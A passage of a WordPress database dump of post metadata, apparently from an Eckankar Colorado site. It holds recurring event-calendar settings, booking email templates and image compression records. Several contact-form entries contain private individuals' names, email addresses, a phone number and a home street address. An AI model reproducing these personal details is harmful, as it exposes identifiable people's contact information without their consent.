;s:10:\"2022-02-27\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153831,266209,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153832,266209,'mec_certain_weekdays','a:0:{}'),(153833,266209,'mec_allday','0'),(153834,266209,'mec_hide_time','0'),(153835,266209,'mec_hide_end_time','0'),(153836,266209,'mec_comment',''),(153837,266209,'mec_repeat_status','0'),(153838,266209,'mec_repeat_type',''),(153839,266209,'mec_repeat_interval','1'),(153840,266209,'mec_repeat_end',''),(153841,266209,'mec_repeat_end_at_occurrences',''),(153842,266209,'mec_repeat_end_at_date',''),(153843,266209,'mec_advanced_days','a:0:{}'),(153844,266209,'mec_in_days',''),(153845,266209,'mec_not_in_days',''),(153846,266209,'mec_hourly_schedules','a:0:{}'),(153847,266209,'mec_booking','a:0:{}'),(153848,266209,'mec_tickets','a:0:{}'),(153849,266209,'mec_fees_global_inheritance','1'),(153850,266209,'mec_fees','a:0:{}'),(153851,266209,'mec_ticket_variations_global_inheritance','1'),(153852,266209,'mec_ticket_variations','a:0:{}'),(153853,266209,'mec_reg_fields_global_inheritance','1'),(153854,266209,'mec_reg_fields','a:0:{}'),(153855,266209,'mec_op','a:0:{}'),(153856,266209,'mec_event_date_submit','20210422105713'),(153857,266209,'mec_read_more',''),(153858,266209,'mec_more_info',''),(153859,266209,'mec_more_info_title',''),(153860,266209,'mec_more_info_target','_self'),(153861,266209,'mec_cost',''),(153862,266209,'mec_currency','a:0:{}'),(153863,266209,'mec_additional_organizer_ids','a:0:{}'),(153864,266209,'mec_additional_location_ids','a:0:{}'),(153865,266209,'one_occurrence','0'),(153866,266209,'mec_timezone','global'),(153867,266209,'mec_countdown_method','global'),(153868,266209,'mec_public','1'),(153869,266209,'mec_bfixed_fields','a:0:{}'),(153870,266209,'mec_fields','a:0:{}'),(153871,266209,'mec_event_status','EventScheduled'),(153872,266209,'mec_moved_online_link',''),(153873,266209,'mec_cancelled_reason',''),(153874,266209,'mec_display_cancellation_reason_in_single_page',''),(153875,266209,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(153876,266209,'passster_activate_global_protection',NULL),(153877,266209,'passster_activate_protection',NULL),(153878,266209,'passster_protection_type','password'),(153879,266209,'_dp_original','265425'),(153880,266209,'_edit_lock','1642995501:2'),(153881,266209,'_edit_last','2'),(153882,266209,'_thumbnail_id','265875'),(153883,266211,'protect_children',''),(153884,266211,'mec_color',''),(153885,266211,'mec_location_id','131'),(153886,266211,'mec_dont_show_map','0'),(153887,266211,'mec_organizer_id','1'),(153888,266211,'mec_start_date','2022-03-13'),(153889,266211,'mec_start_time_hour','1'),(153890,266211,'mec_start_time_minutes','0'),(153891,266211,'mec_start_time_ampm','PM'),(153892,266211,'mec_start_day_seconds','46800'),(153893,266211,'mec_end_date','2022-03-13'),(153894,266211,'mec_end_time_hour','2'),(153895,266211,'mec_end_time_minutes','30'),(153896,266211,'mec_end_time_ampm','PM'),(153897,266211,'mec_end_day_seconds','52200'),(153898,266211,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-13\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-13\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153899,266211,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153900,266211,'mec_certain_weekdays','a:0:{}'),(153901,266211,'mec_allday','0'),(153902,266211,'mec_hide_time','0'),(153903,266211,'mec_hide_end_time','0'),(153904,266211,'mec_comment',''),(153905,266211,'mec_repeat_status','0'),(153906,266211,'mec_repeat_type',''),(153907,266211,'mec_repeat_interval','1'),(153908,266211,'mec_repeat_end',''),(153909,266211,'mec_repeat_end_at_occurrences',''),(153910,266211,'mec_repeat_end_at_date',''),(153911,266211,'mec_advanced_days','a:0:{}'),(153912,266211,'mec_in_days',''),(153913,266211,'mec_not_in_days',''),(153914,266211,'mec_hourly_schedules','a:0:{}'),(153915,266211,'mec_booking','a:0:{}'),(153916,266211,'mec_tickets','a:0:{}'),(153917,266211,'mec_fees_global_inheritance','1'),(153918,266211,'mec_fees','a:0:{}'),(153919,266211,'mec_ticket_variations_global_inheritance','1'),(153920,266211,'mec_ticket_variations','a:0:{}'),(153921,266211,'mec_reg_fields_global_inheritance','1'),(153922,266211,'mec_reg_fields','a:0:{}'),(153923,266211,'mec_op','a:0:{}'),(153924,266211,'mec_event_date_submit','20210422105713'),(153925,266211,'mec_read_more',''),(153926,266211,'mec_more_info',''),(153927,266211,'mec_more_info_title',''),(153928,266211,'mec_more_info_target','_self'),(153929,266211,'mec_cost',''),(153930,266211,'mec_currency','a:0:{}'),(153931,266211,'mec_additional_organizer_ids','a:0:{}'),(153932,266211,'mec_additional_location_ids','a:0:{}'),(153933,266211,'one_occurrence','0'),(153934,266211,'mec_timezone','global'),(153935,266211,'mec_countdown_method','global'),(153936,266211,'mec_public','1'),(153937,266211,'mec_bfixed_fields','a:0:{}'),(153938,266211,'mec_fields','a:0:{}'),(153939,266211,'mec_event_status','EventScheduled'),(153940,266211,'mec_moved_online_link',''),(153941,266211,'mec_cancelled_reason',''),(153942,266211,'mec_display_cancellation_reason_in_single_page',''),(153943,266211,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(153944,266211,'passster_activate_global_protection',NULL),(153945,266211,'passster_activate_protection',NULL),(153946,266211,'passster_protection_type','password'),(153949,266211,'_dp_original','266209'),(153948,266211,'_thumbnail_id','265875'),(153950,266211,'_edit_lock','1645748500:15'),(153951,266211,'_edit_last','15'),(153952,266212,'protect_children',''),(153953,266212,'mec_color',''),(153954,266212,'mec_location_id','131'),(153955,266212,'mec_dont_show_map','0'),(153956,266212,'mec_organizer_id','1'),(153957,266212,'mec_start_date','2022-04-24'),(153958,266212,'mec_start_time_hour','1'),(153959,266212,'mec_start_time_minutes','0'),(153960,266212,'mec_start_time_ampm','PM'),(153961,266212,'mec_start_day_seconds','46800'),(153962,266212,'mec_end_date','2022-04-24'),(153963,266212,'mec_end_time_hour','2'),(153964,266212,'mec_end_time_minutes','30'),(153965,266212,'mec_end_time_ampm','PM'),(153966,266212,'mec_end_day_seconds','52200'),(153967,266212,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-24\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-24\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153968,266212,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153969,266212,'mec_certain_weekdays','a:0:{}'),(153970,266212,'mec_allday','0'),(153971,266212,'mec_hide_time','0'),(153972,266212,'mec_hide_end_time','0'),(153973,266212,'mec_comment',''),(153974,266212,'mec_repeat_status','0'),(153975,266212,'mec_repeat_type',''),(153976,266212,'mec_repeat_interval','1'),(153977,266212,'mec_repeat_end',''),(153978,266212,'mec_repeat_end_at_occurrences',''),(153979,266212,'mec_repeat_end_at_date',''),(153980,266212,'mec_advanced_days','a:0:{}'),(153981,266212,'mec_in_days',''),(153982,266212,'mec_not_in_days',''),(153983,266212,'mec_hourly_schedules','a:0:{}'),(153984,266212,'mec_booking','a:0:{}'),(153985,266212,'mec_tickets','a:0:{}'),(153986,266212,'mec_fees_global_inheritance','1'),(153987,266212,'mec_fees','a:0:{}'),(153988,266212,'mec_ticket_variations_global_inheritance','1'),(153989,266212,'mec_ticket_variations','a:0:{}'),(153990,266212,'mec_reg_fields_global_inheritance','1'),(153991,266212,'mec_reg_fields','a:0:{}'),(153992,266212,'mec_op','a:0:{}'),(153993,266212,'mec_event_date_submit','20210422105713'),(153994,266212,'mec_read_more',''),(153995,266212,'mec_more_info',''),(153996,266212,'mec_more_info_title',''),(153997,266212,'mec_more_info_target','_self'),(153998,266212,'mec_cost',''),(153999,266212,'mec_currency','a:0:{}'),(154000,266212,'mec_additional_organizer_ids','a:0:{}'),(154001,266212,'mec_additional_location_ids','a:0:{}'),(154002,266212,'one_occurrence','0'),(154003,266212,'mec_timezone','global'),(154004,266212,'mec_countdown_method','global'),(154005,266212,'mec_public','1'),(154006,266212,'mec_bfixed_fields','a:0:{}'),(154007,266212,'mec_fields','a:0:{}'),(154008,266212,'mec_event_status','EventScheduled'),(154009,266212,'mec_moved_online_link',''),(154010,266212,'mec_cancelled_reason',''),(154011,266212,'mec_display_cancellation_reason_in_single_page',''),(154012,266212,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(154013,266212,'passster_activate_global_protection',NULL),(154014,266212,'passster_activate_protection',NULL),(154015,266212,'passster_protection_type','password'),(154018,266212,'_dp_original','266209'),(154017,266212,'_thumbnail_id','265875'),(154019,266212,'_edit_lock','1647391819:15'),(154020,266212,'_edit_last','15'),(154029,266215,'_field_30','FIl D\'Or'),(154030,266215,'_field_31','Piraber'),(154031,266215,'_field_32','(720) 275-6397'),(154032,266215,'_field_33','piravfildor@gmail.com'),(154033,266215,'_field_34','1135 BROADWAY  Apt 413'),(154034,266215,'_field_35','DENVER'),(154035,266215,'_field_36','CO'),(154036,266215,'_field_37','US'),(154037,266215,'_field_39','I filled this form before, but I have not received a newsletter or any other Eckankar Colorado announcements.'),(154038,266215,'_form_id','4'),(154039,266215,'_seq_num','19'),(154040,266216,'_field_224','Kevin'),(154041,266216,'_field_225','Kevin'),(154042,266216,'_field_226','kevinbrantigan82@gmail.com'),(154043,266216,'_field_227','CO'),(154044,266216,'_field_228','US'),(154045,266216,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(154046,266216,'_form_id','21'),(154047,266216,'_seq_num','142'),(154048,266217,'_wp_attached_file','2022/01/gatewa-1y-steps.jpg'),(154049,266217,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:27:\"2022/01/gatewa-1y-steps.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"gatewa-1y-steps-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"gatewa-1y-steps-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"gatewa-1y-steps-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"gatewa-1y-steps-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"gatewa-1y-steps-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"gatewa-1y-steps-300x380.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"gatewa-1y-steps-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154050,266217,'original-file','2022/01/gatewa-1y-steps-updraft-pre-smush-original.jpg'),(154051,266217,'smush-complete','1'),(154052,266217,'smush-info','The file was compressed from 58.29 KB to 56.75 KB saving 2.65 percent using WP-Optimize'),(154053,266217,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:59688;s:12:\"smushed-size\";i:58108;s:15:\"savings-percent\";d:2.649999999999999911182158029987476766109466552734375;}'),(154208,266265,'_seq_num','34'),(154207,266265,'_form_id','46'),(154206,266265,'_field_427','bngstreet@gmail.com'),(154205,266265,'_field_426','Greenstreet'),(154204,266265,'_field_425','Bonnie'),(193872,269227,'_field_649',''),(154064,266225,'_wp_attached_file','2022/02/meetup-hmpg-row-of-3.png'),(154065,266225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:378;s:6:\"height\";i:190;s:4:\"file\";s:32:\"2022/02/meetup-hmpg-row-of-3.png\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"meetup-hmpg-row-of-3-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"meetup-hmpg-row-of-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:32:\"meetup-hmpg-row-of-3-300x190.png\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:32:\"meetup-hmpg-row-of-3-300x190.png\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154066,266226,'_wp_attached_file','2022/02/podcast-hmpg-row-of-3.png'),(154067,266226,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:196;s:4:\"file\";s:33:\"2022/02/podcast-hmpg-row-of-3.png\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"podcast-hmpg-row-of-3-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"podcast-hmpg-row-of-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:33:\"podcast-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:33:\"podcast-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154068,266227,'_wp_attached_file','2022/02/eck-blog-hmpg-row-of-3.png'),(154069,266227,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:196;s:4:\"file\";s:34:\"2022/02/eck-blog-hmpg-row-of-3.png\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"eck-blog-hmpg-row-of-3-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"eck-blog-hmpg-row-of-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:34:\"eck-blog-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:34:\"eck-blog-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154070,266228,'_wp_attached_file','2022/02/eck-books-hmpg-row-of-3.png'),(154071,266228,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:196;s:4:\"file\";s:35:\"2022/02/eck-books-hmpg-row-of-3.png\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"eck-books-hmpg-row-of-3-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"eck-books-hmpg-row-of-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:35:\"eck-books-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:35:\"eck-books-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154072,266229,'_wp_attached_file','2022/02/esc-temple-hmpg-row-of-3.png'),(154073,266229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:196;s:4:\"file\";s:36:\"2022/02/esc-temple-hmpg-row-of-3.png\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"esc-temple-hmpg-row-of-3-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"esc-temple-hmpg-row-of-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:36:\"esc-temple-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:36:\"esc-temple-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154074,266230,'_wp_attached_file','2022/02/hu-song-hmpg-row-of-3.png'),(154075,266230,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:196;s:4:\"file\";s:33:\"2022/02/hu-song-hmpg-row-of-3.png\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"hu-song-hmpg-row-of-3-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"hu-song-hmpg-row-of-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:33:\"hu-song-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:33:\"hu-song-hmpg-row-of-3-300x196.png\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154076,266227,'original-file','2022/02/eck-blog-hmpg-row-of-3-updraft-pre-smush-original.png'),(154077,266227,'smush-complete','1'),(154078,266227,'smush-info','The file was compressed from 135.64 KB to 37.58 KB saving 72.29 percent using WP-Optimize'),(154079,266227,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:138896;s:12:\"smushed-size\";i:38485;s:15:\"savings-percent\";d:72.2900000000000062527760746888816356658935546875;}'),(154080,266226,'original-file','2022/02/podcast-hmpg-row-of-3-updraft-pre-smush-original.png'),(154081,266226,'smush-complete','1'),(154082,266226,'smush-info','The file was compressed from 140.14 KB to 43.04 KB saving 69.28 percent using WP-Optimize'),(154083,266226,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:143499;s:12:\"smushed-size\";i:44076;s:15:\"savings-percent\";d:69.280000000000001136868377216160297393798828125;}'),(154084,266225,'original-file','2022/02/meetup-hmpg-row-of-3-updraft-pre-smush-original.png'),(154085,266225,'smush-complete','1'),(154086,266225,'smush-info','The file was compressed from 119.44 KB to 36.85 KB saving 69.15 percent using 